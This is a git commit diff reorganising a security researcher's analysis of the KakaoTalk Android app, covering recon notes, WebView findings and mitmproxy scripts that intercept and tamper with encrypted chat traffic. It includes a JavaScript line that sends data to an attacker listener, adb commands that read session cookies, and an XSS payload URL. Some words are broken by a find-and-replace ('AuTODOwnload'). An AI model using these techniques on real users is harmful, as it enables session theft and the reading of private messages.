Finalize write-up

This commit is contained in:
stulle123 2023-12-26 17:09:47 +01:00
parent 3c9880d142
commit 99ff6f8727
11 changed files with 47 additions and 39 deletions

View File

@ -2,18 +2,19 @@
## Setup
[My setup used to analyze the KakaoTalk Android app](SETUP.md).
[My setup used to analyze the KakaoTalk Android app](./doc/SETUP.md).
## Recon
- [General recon notes](RECON.md).
- [WebView recon](./recon/webview/WEBVIEW.md).
## Scripts
Frida and mitmproxy scripts are [here](./scripts/).
- [General recon notes](./doc/RECON.md).
- [WebView recon](./doc/WEBVIEW.md).
## Findings
- [Steal another user's chat messages](ACCOUNT_TAKEOVER.md)
- [Secret Chat findings](SECRET_CHAT.md)
- [Steal another user's chat messages](./doc/ACCOUNT_TAKEOVER.md)
- [Secret Chat findings](./doc/SECRET_CHAT.md)
## Scripts
- Frida and mitmproxy scripts are in [here](./scripts/).
- [How to run the mitmproxy scripts](./scripts/mitmproxy/README.md)

View File

@ -18,7 +18,7 @@
> Disclaimer: Initial recon was performed on an older version of KakaoTalk (`10.1.7`).
> There are a lot of **TO-DO's** in this document where one can try to dig deeper.
> There are a lot of **TODO's** in this document where one can try to dig deeper.
## General App Infos
@ -86,7 +86,7 @@ zzng.xml
Some values (e.g., OAuth tokens) in the Shared Preferences are encrypted with a static key which is derived from a hard-coded passphrase (can be found in class `SimpleCipher`).
**TO-DO**: Check Shared Prefs for sensitive information.
**TODO**: Check Shared Prefs for sensitive information.
Trace Shared Prefs usage with this [Frida script](https://github.com/m0bilesecurity/Frida-Mobile-Scripts/blob/master/Android/shared_preferences_monitor.js). See [example trace](./recon/frida_trace_shared_prefs.log).
@ -105,13 +105,13 @@ multi_profile_database.db
One can decrypt the contents of `KakaoTalk.db` and `KakaoTalk2.db` with this [script](https://github.com/jiru/kakaodecrypt).
**TO-DO**: Find the password for the `crypto_database`. Hook `TrustStore` or `sqlite3_key` after a fresh app install and before login. Implementation in `com.kakao.talk.database.CryptoDatabase`.
**TODO**: Find the password for the `crypto_database`. Hook `TrustStore` or `sqlite3_key` after a fresh app install and before login. Implementation in `com.kakao.talk.database.CryptoDatabase`.
## Rest APIs
Most endpoints are HTTPS protected. Certs in the `assets/sdk` folder are used for certification pinning (see class `com.kakao.i.http.g.b`).
Java interfaces with interesting Rest APIs (interface names generated by `jadx`): **TO-DO**: Add GET and POST requests. Use `sqlmap -r` to *fuzz* the Rest APIs.
Java interfaces with interesting Rest APIs (interface names generated by `jadx`): **TODO**: Add GET and POST requests. Use `sqlmap -r` to *fuzz* the Rest APIs.
Interesting classes:
```
@ -138,19 +138,19 @@ Many many (exported) `BROWSABLE` Activities.
## Services
**TO-DO**
**TODO**
## Content Providers
**TO-DO**
**TODO**
## Broadcast Receivers
**TO-DO**
**TODO**
## WebViews
See [here](./recon/webview/WEBVIEW.md).
See [here](./WEBVIEW.md).
## Firebase
@ -193,7 +193,7 @@ $ curl "https://firebaseremoteconfig.googleapis.com/v1/projects/552367303137/nam
## Native Libs
**TO-DO**: Check for memory corruption bugs in native libs (located in `/data/app/com.kakao.talk-wRI5HzbljAi9o-6SZLN55g==/lib/arm64`):
**TODO**: Check for memory corruption bugs in native libs (located in `/data/app/com.kakao.talk-wRI5HzbljAi9o-6SZLN55g==/lib/arm64`):
```bash
libACExternalCore.so libc++_shared.so libopencv_java4.so

View File

@ -41,12 +41,10 @@ Android implementation specifics:
- Receiver's public keys in table `public_key_info` of `KakaoTalk.db` database
- Shared secret stored in table `secret_key_info` of `KakaoTalk.db` database
TO-DOS:
TODOS:
- Reinstall the app and check whether a warning shows up
- Test CFB bit flipping
- How are the msgId and chatId generated? -> nonce for CTR mode!
Demo:
![MITM](https://github.com/stulle123/kakaotalk_analysis/tree/main/scripts/mitmproxy/secret_chat_demo.gif?raw=true)
![MITM](https://github.com/stulle123/kakaotalk_analysis/tree/main/doc/secret_chat_demo.gif?raw=true)

View File

@ -53,7 +53,7 @@ Install required tools:
- Get latest [jadx](https://nightly.link/skylot/jadx/workflows/build-artifacts/master)
- Get [Burp Suite](https://portswigger.net/burp/communitydownload)
- Get [KakaoTalk for Windows/MacOS](https://www.kakaocorp.com/page/service/service/KakaoTalk?lang=en)
- Get [KakaoTalk for MacOS](https://www.kakaocorp.com/page/service/service/KakaoTalk?lang=en)
- `$ brew install apktool nuclei sqlite db-browser-for-sqlite`
- `$ pip3 install --upgrade frida-tools mitmproxy`

View File

@ -1,7 +1,7 @@
# WebView Recon
- [Low Severity Findings](#low-severity-findings)
- [To-Dos / Digging](#to-dos--digging)
- [TODOs / Digging](#TODOs--digging)
- [Tokens / Cookies](#tokens--cookies)
- [JavaScript Interfaces](#javascriptinterface)
- [Redirect Endpoints](#redirect-endpoints)
@ -20,7 +20,7 @@
> Disclaimer: Initial recon was performed on an older version of KakaoTalk (`10.1.7`).
> There are a lot of **TO-DO's** in this document where one can try to dig deeper.
> There are a lot of **TODO's** in this document where one can try to dig deeper.
## Low Severity Findings
@ -113,14 +113,14 @@ img.src = 'http://10.0.2.2:8888?data=' + encodeURIComponent(data);
- Reading a cookie: `adb shell content read --uri "content://com.kakao.talk.FileProvider/external_files/emulated/0/Android/data/com.kakao.talk/KakaoTalk/cookie/.57f323da7592b0b5de1360de3da701b0d1aa6627"`
- Using the `android-app:` scheme: `adb shell am start "android-app://#Intent\;component=com.kakao.talk/.activity.setting.MyProfileSettingsActivity\;S.EXTRA_URL=content://com.kakao.talk.FileProvider/external_files/emulated/0/Android/data/com.kakao.talk/KakaoTalk/cookie/.57f323da7592b0b5de1360de3da701b0d1aa6627\;end"`
- There are a couple of JavaScript interfaces that access the user's location (see [below](#javascriptinterface))
- Auto-download to `/sdcard/Download` via Chrome (`app://kakaotalk/openURL?url=`)
- AuTODOwnload to `/sdcard/Download` via Chrome (`app://kakaotalk/openURL?url=`)
- I can access other `BROWSABLE` Activities or Apps via the `android-app:` scheme, e.g.:
- `location.href = "android-app://com.google.android.googlequicksearchbox/https/www.google.com"`
- `setWebContentsDebuggingEnabled` is enabled for most WebViews
- XSS in `com.kakao.talk.activity.cscenter.CsCenterActivity` (search field)
- https://cs.kakao.com/search?query=%3Cscript%3Ealert%281%29%3C%2Fscript%3E (you need to click into the search field to trigger the alert)
## To-Dos / Digging
## TODOs / Digging
Things to try out / dig deeper.
@ -241,17 +241,17 @@ Maybe someone finds a XSS here:
- `XMLHttpRequest` still won't work -> because it's not a `file://` URL?
- Need to be able to create/download files in/to `Download` folder
- Cannot steal files that cannot be rendered in a Webview (e.g., `LocalUser_DataStore.pref.preferences_pb` in `files` folder). Text files work fine: `content://com.kakao.talk.FileProvider/onepass/PersistedInstallation.W0RFRkFVTFRd+MTo1NTIzNjczMDMxMzc6YW5kcm9pZDpiNjUwZmVmOGI2MDY1MzVm.json`.
- `CommerceShopperWebViewActivity` doesn't auto-download but also doesn't render binary files
- `CommerceShopperWebViewActivity` doesn't auTODOwnload but also doesn't render binary files
### DownloadListener.onDownloadStart
- Check `p21.e` / `DownloaderTask` class (`com.kakao.talk.widget.webview.WebViewHelper` -> `processDownload()` -> `C42792b.m9697b()` -> `DownloaderTask.m16277b()`)
- **TO-DO**: Try path traversal
- **TODO**: Try path traversal
- Bypass `DownloaderTask` checks
- Downloads files to `/sdcard/Download/` directory
- Not able to overwrite files
- Play with `data:` URIs (`data:[<mediatype>][;base64],<data>`)
- **TO-DO:** I *might* be able to force WebViews to auto-download files by pointing them to an attacker-controlled website. Required headers:
- **TODO:** I *might* be able to force WebViews to auTODOwnload files by pointing them to an attacker-controlled website. Required headers:
- `Content-Type: application/octet-stream`
- `content-disposition: attachment; filename=foo.html`
- Investigate `com.kakao.talk.widget.webview.WebViewHelper` class:

View File

Before

Width:  |  Height:  |  Size: 1.3 MiB

After

Width:  |  Height:  |  Size: 1.3 MiB

View File

@ -1,21 +1,31 @@
# MITM Kakaotalk LOCO Packets
# mitmproxy Scripts
This is a simple script to man-in-the-middle LOCO packets with mitmproxy.
There are four `mitmproxy` scripts in this directory to play with LOCO traffic:
Setup on your MITM host:
- `flip_ciphertext_bits.py` -> a POC for showing the CFB malleability of encrypted LOCO packets
- `replace_loco_message.py` -> Replace a LOCO message with another one to show missing integrity protection
- `mitm_single_tls_host.py` -> MITM a single TLS host only. Passthrough all other TLS traffic.
- `mitm_secret_chat.py` -> MITM end-to-end encrypted *SECRET CHAT* messages
To run the scripts, do the following:
1. Start mitmproxy script on your MITM host and copy the WireGuard config:
```bash
$ python3 -m venv venv
$ source venv/bin/activate
(venv) $ python3 -m pip install mitmproxy bson cryptography
(venv) $ mitmdump --mode wireguard --rawtcp -s loco_mitm.py
(venv) $ mitmdump --mode wireguard --rawtcp -s replace_loco_message.py
```
Android emulator setup:
2. Android device/emulator setup:
- Install the Kakaotalk app if not done already
- Install the WireGuard app
- Change the IP address in mitmproxy's generated WireGuard config to `10.0.2.2`. Example:
- Import mitmproxy's generated WireGuard config into the WireGuard app
If you run the Android Emulator on your MITM host, change the IP address to `10.0.2.2`. Example:
```
[Interface]
PrivateKey = MCCAFVMZQk+k+sbdXx0B4LG+Mij/UO7qyWa7IRqv/nA=
@ -27,9 +37,8 @@ PublicKey = K+t/qiGO8tlA9L7wjAOb8wqjnu/NuthHgLs2gOCIDgY=
AllowedIPs = 0.0.0.0/0
Endpoint = 10.0.2.2:51820
```
- Import the config into the WireGuard app
Back on your MITM host start Frida (see [setup instructions](../../SETUP.md#setup-frida-to-disable-certificate-pinning)):
3. Start Frida on MITM host (see [setup instructions](../../doc/SETUP.md#setup-frida-to-disable-certificate-pinning))
```bash
# Start frida-server
@ -39,7 +48,7 @@ $ adb root && adb shell /data/local/tmp/frida-server
$ frida -U -l loco-tracer.js -f com.kakao.talk
```
To run the unit tests:
Optional: To run the unit tests for `mitm_secret_chat.py`:
- Install `pytest` and `pytest-datadir` via pip
- Run the tests: `$ pytest tests/test_loco_parser.py`